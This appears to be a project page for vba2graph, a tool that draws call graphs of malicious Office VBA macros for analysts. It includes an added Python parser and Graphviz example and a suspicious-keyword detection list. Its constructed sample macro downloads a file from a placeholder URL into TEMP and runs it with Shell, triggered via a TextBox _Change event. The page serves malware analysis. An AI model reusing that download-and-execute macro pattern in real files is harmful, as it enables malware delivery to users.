Vba2graph - Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

A tool for security researchers who spend their time analyzing malicious Office macros.
Generates a VBA call graph, with potentially malicious keywords highlighted.
Allows for quick analysis of malicious macros and easy understanding of the execution flow.

Features
  • Keyword highlighting
  • VBA Properties support
  • External function declaration support
  • Tricky macros with "_Change" execution triggers
  • Fancy color schemes!
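To make the feature list concrete, here is an added example (written for this page; it is not vba2graph's own code and does not reproduce its parser) of the analysis a VBA call-graph tool performs: it splits a macro into procedures, records external Declare statements as leaf nodes, links callers to callees, resolves "_Change" triggers fired by assignments to a control's Text/Value, flags procedures that contain suspicious keywords, and emits Graphviz DOT. The macro, the keyword list and all function names are constructed for the example; the sample is a harmless skeleton of the downloader pattern described later on this page.

```python
import re
from collections import OrderedDict

# Keywords that frequently show up in malicious macros. Assumed list for this
# example, not vba2graph's own keyword set.
SUSPICIOUS_KEYWORDS = ("Shell", "CreateObject", "WScript.Shell", "URLDownloadToFile",
                       "Environ", "Chr", "Kill", "Execute")

# Procedure header: optional visibility, then Sub / Function / Property Get|Let|Set and a name.
PROC_RE = re.compile(r'^\s*(?:(?:Public|Private|Friend)\s+)?(?:Static\s+)?'
                     r'(Sub|Function|Property\s+(?:Get|Let|Set))\s+(\w+)', re.I)
# External function declaration (Declare ... Lib "..."); these become leaf nodes.
DECLARE_RE = re.compile(r'^\s*(?:(?:Public|Private)\s+)?Declare\s+(?:PtrSafe\s+)?'
                        r'(?:Sub|Function)\s+(\w+)', re.I)
END_RE = re.compile(r'^\s*End\s+(?:Sub|Function|Property)\b', re.I)
# Assigning a control's Text/Value/Caption fires that control's <name>_Change handler.
TRIGGER_RE = re.compile(r'\b(\w+)\.(?:Text|Value|Caption)\s*=', re.I)

# Constructed sample macro (no real URL or payload); mirrors the Document_Open ->
# TextBox_Change -> download -> Shell chain typical of macro downloaders.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Sub Document_Open()
    TextBox1.Text = "go"
End Sub

Private Sub TextBox1_Change()
    Fetch "http://example.invalid/payload", Environ("TEMP") & "\a.exe"
End Sub

Public Sub Fetch(url As String, dst As String)
    URLDownloadToFile 0, url, dst, 0, 0
    Run dst
End Sub

Private Function Run(path As String) As Long
    Run = Shell(path, 1)
End Function

Public Property Get Secret() As String
    Secret = Chr(72) & Chr(105)
End Property
'''


def parse_vba(code):
    """Split VBA source into procedures (name -> body lines) and external declarations."""
    code = re.sub(r'[ \t]_\r?\n', ' ', code)  # join "_" line continuations first
    procs, externals, current = OrderedDict(), [], None
    for line in code.splitlines():
        m = DECLARE_RE.match(line)
        if m:
            externals.append(m.group(1))
            continue
        m = PROC_RE.match(line)
        if m:
            current = m.group(2)
            procs[current] = []
            continue
        if END_RE.match(line):
            current = None
            continue
        if current is not None:
            procs[current].append(line)
    return procs, externals


def build_graph(code):
    """Return procedures, externals, (caller, callee, kind) edges and per-procedure keywords."""
    procs, externals = parse_vba(code)
    names = list(procs) + externals
    lookup = {n.lower(): n for n in names}  # VBA identifiers are case-insensitive
    edges, keywords = [], {}
    for caller, body in procs.items():
        text = "\n".join(body)
        # Direct calls: any other known procedure or external name used in the body.
        for callee in names:
            if callee.lower() != caller.lower() and \
                    re.search(r'\b%s\b' % re.escape(callee), text, re.I):
                edges.append((caller, callee, "call"))
        # Indirect calls: writing a control's value runs its <control>_Change handler.
        for ctrl in TRIGGER_RE.findall(text):
            handler = lookup.get((ctrl + "_change").lower())
            if handler:
                edges.append((caller, handler, "trigger"))
        keywords[caller] = [kw for kw in SUSPICIOUS_KEYWORDS
                            if re.search(r'(?<!\w)%s(?!\w)' % re.escape(kw), text, re.I)]
    return {"procs": list(procs), "externals": externals, "edges": edges, "keywords": keywords}


def to_dot(graph):
    """Render as Graphviz DOT: flagged procedures are filled, externals boxed, triggers dashed."""
    out = ["digraph vba {", "  rankdir=LR;", "  node [fontname=Helvetica];"]
    for name in graph["procs"]:
        kws = graph["keywords"][name]
        label = "%s\\n[%s]" % (name, ", ".join(kws)) if kws else name
        style = ' style=filled fillcolor="#ff9999"' if kws else ""
        out.append('  "%s" [label="%s"%s];' % (name, label, style))
    for name in graph["externals"]:
        out.append('  "%s" [shape=box style=dashed];' % name)
    for caller, callee, kind in graph["edges"]:
        attrs = ' [style=dashed label="trigger"]' if kind == "trigger" else ""
        out.append('  "%s" -> "%s"%s;' % (caller, callee, attrs))
    out.append("}")
    return "\n".join(out)


if __name__ == "__main__":
    # Pipe the output into "dot -Tpng -o graph.png" to render it.
    print(to_dot(build_graph(SAMPLE_VBA)))
```

The trigger edge is what makes the Document_Open to TextBox1_Change hop visible; a plain text search for the handler name would miss it, because nothing in the macro ever names TextBox1_Change directly.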

Pros
  • Pretty fast
  • Works well on most malicious macros seen in the wild

Cons
  • Static (dynamically resolved calls would not be recognized)


Examples
Example 1:
Trickbot downloader - uses an object Resize event as the initial trigger, followed by TextBox_Change triggers.

Example 2:

Check out the Examples folder for more cases.

Installation

Install oletools:
https://github.com/decalage2/oletools/wiki/Install

Install Python Requirements
pip2 install -r requirements.txt

Install Graphviz

Windows
Install Graphviz msi:
https://graphviz.gitlab.io/_pages/Download/Download_windows.html
Add "dot.exe" to PATH env variable or just:
set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin

Mac
brew install graphviz

Ubuntu
sudo apt-get install graphviz

Arch
sudo pacman -S graphviz

Usage
usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        output folder (default: "output")
  -c {0,1,2,3}, --colors {0,1,2,3}
                        color scheme number [0, 1, 2, 3] (default: 0 - B&W)
  -i INPUT, --input INPUT
                        olevba generated file or .bas file
  -f FILE, --file FILE  Office file with macros

Usage Examples (All Platforms)
Only Python 2 is supported:

# Generate call graph directly from an Office file with macros [tnx @doomedraven]
python2 vba2graph.py -f malicious.doc -c 2

# Generate VBA code using olevba, then pipe it to vba2graph
olevba malicious.doc | python2 vba2graph.py -c 1

# Generate call graph from VBA code
python2 vba2graph.py -i vba_code.bas -o output_folder

Output
You'll get 4 folders in your output folder:
  • png: the actual graph image you are looking for
  • svg: same graph image, just in vector graphics
  • dot: the DOT file which was used to create the graph image
  • bas: the VBA functions code that was recognized by the script (for debugging)

Batch Processing

Mac/Linux:
The batch.sh script file is attached for running olevba and vba2graph on an input folder of malicious docs.
It deletes the output dir; use with caution.